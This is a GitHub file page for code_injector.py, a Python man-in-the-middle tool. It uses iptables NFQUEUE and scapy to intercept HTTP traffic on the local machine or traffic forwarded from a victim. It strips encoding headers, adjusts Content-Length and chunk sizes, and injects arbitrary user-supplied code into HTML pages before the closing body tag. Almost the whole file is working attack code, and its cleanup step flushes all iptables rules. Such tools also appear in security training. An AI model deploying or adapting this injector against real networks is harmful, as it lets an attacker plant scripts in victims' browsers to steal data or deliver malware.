-
Notifications
You must be signed in to change notification settings - Fork 0
Expand file tree
/
Copy pathcode_injector.py
More file actions
156 lines (127 loc) · 5.7 KB
/
code_injector.py
File metadata and controls
156 lines (127 loc) · 5.7 KB
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
import netfilterqueue
import subprocess
from scapy.all import Raw
from scapy.layers.inet import IP, TCP
import argparse
import re
import sys
import traceback
def get_arguments():
parser = argparse.ArgumentParser()
parser.add_argument("-m", "--machine", dest="machine", help="Machine to execute command on (local/remote)")
parser.add_argument("-i", "--inject", dest="inject", help="Injection code to execute")
args = parser.parse_args()
if not args.machine or args.machine not in ["local", "remote"]:
parser.error("[-] Invalid input; Please specify a machine; Use -h or --help for more info")
if not args.inject:
parser.error("[-] Invalid input; Please specify a code to inject; Use -h or --help for more info")
return args
def set_iptables_rule(machine):
if machine == "local":
values = ["OUTPUT", "INPUT"]
elif machine == "remote":
values = ["FORWARD"]
else:
raise ValueError("Invalid machine type")
for iptables_cmd in values:
subprocess.call(["sudo", "iptables", "-I", iptables_cmd, "-j", "NFQUEUE", "--queue-num", "0"])
print("[+] Setting iptables for {} machine".format(machine))
def set_load(packet, load):
del packet[IP].len
del packet[IP].chksum
del packet[TCP].chksum
packet[Raw].load = load
return packet
def process_packets(packet):
try:
scapy_packet = IP(packet.get_payload())
if scapy_packet.haslayer(Raw) and scapy_packet.haslayer(TCP):
load = scapy_packet[Raw].load
if scapy_packet[TCP].dport == 80:
load = re.sub(b"(?:Accept-Encoding|Upgrade-Insecure-Requests|grade-Insecure-Requests):.*?\r\n",
b"", load)
if scapy_packet[TCP].ack not in req_ack:
req_ack.append(scapy_packet[TCP].ack)
modified_packet = set_load(scapy_packet, load)
packet.set_payload(bytes(modified_packet))
packet.accept()
print("[+] REQUEST")
if scapy_packet[TCP].sport == 80:
print("[+] RESPONSE")
injection_code = b"\n" + arguments.inject.encode(errors="ignore") + b"\n"
injection_code_length = len(injection_code)
if load and scapy_packet[TCP].seq in req_ack and b'200 OK' in load and b'Content-Length' in load:
load = modify_content_length(load, injection_code)
modified_packet = set_load(scapy_packet, load)
packet.set_payload(bytes(modified_packet))
packet.accept()
req_ack.remove(scapy_packet[TCP].seq)
elif load and scapy_packet[TCP].seq in req_ack and b'200 OK' in load and b'Transfer-Encoding: chunked' in load:
find_chunk = load.find(b'\r\n\r\n')
chunk_start = load[find_chunk + len(b'\r\n\r\n'):]
chunk_data_start = chunk_start.find(b'\r\n')
hex_data = chunk_start[:chunk_data_start]
hex_data_value = int(hex_data, 16)
hex_data_value = hex_data_value + injection_code_length
hex_data_value = hex(hex_data_value)[2:].encode(errors="ignore")
load = load.replace(hex_data, hex_data_value)
res_ack.append(scapy_packet[TCP].ack)
req_ack.remove(scapy_packet[TCP].seq)
modified_packet = set_load(scapy_packet, load)
packet.set_payload(bytes(modified_packet))
packet.accept()
elif load and scapy_packet[TCP].ack in res_ack and b'\n\r\n0\r\n\r\n' not in load:
modified_packet = set_load(scapy_packet, load)
packet.set_payload(bytes(modified_packet))
packet.accept()
elif load and scapy_packet[TCP].ack in res_ack and b'\n\r\n0\r\n\r\n' in load:
load = load.replace(b'</body>', injection_code + b"</body>")
modified_packet = set_load(scapy_packet, load)
packet.set_payload(bytes(modified_packet))
packet.accept()
else:
packet.accept()
else:
packet.accept()
except Exception as e:
handle_exception(e)
def modify_content_length(load, injection_code):
if load:
content_length_search = re.search(b"Content-Length:\s(\d*)", load)
if content_length_search and b"text/html" in load:
load = load.replace(b"</body>", injection_code + b"</body>")
content_length = content_length_search.group(1)
new_content_length = str(int(content_length) + len(injection_code)).encode(errors="ignore")
load = load.replace(content_length, new_content_length)
return load
else:
return load
return load
def queue_packets():
queue = netfilterqueue.NetfilterQueue()
queue.bind(0, process_packets)
print("\n[+] Starting code injector")
set_iptables_rule(arguments.machine)
print("[+] Code injector started successfully!\n")
try:
queue.run()
except KeyboardInterrupt:
print("\n\n[-] Closing code injector")
finally:
cleanup()
def handle_exception(exception):
print("\n\n[!] An error occurred: ", str(exception) + "\n\n")
traceback.print_exc()
print("\n\n[-] Terminating session")
sys.exit(1)
def cleanup():
subprocess.call(["sudo", "iptables", "--flush"])
print("[-] Flushing iptables")
print("[-] Code injector ended successfully!")
buffer_chunks_list = []
req_ack = []
res_seq = []
res_ack = []
given_chunks_hex = []
arguments = get_arguments()
queue_packets()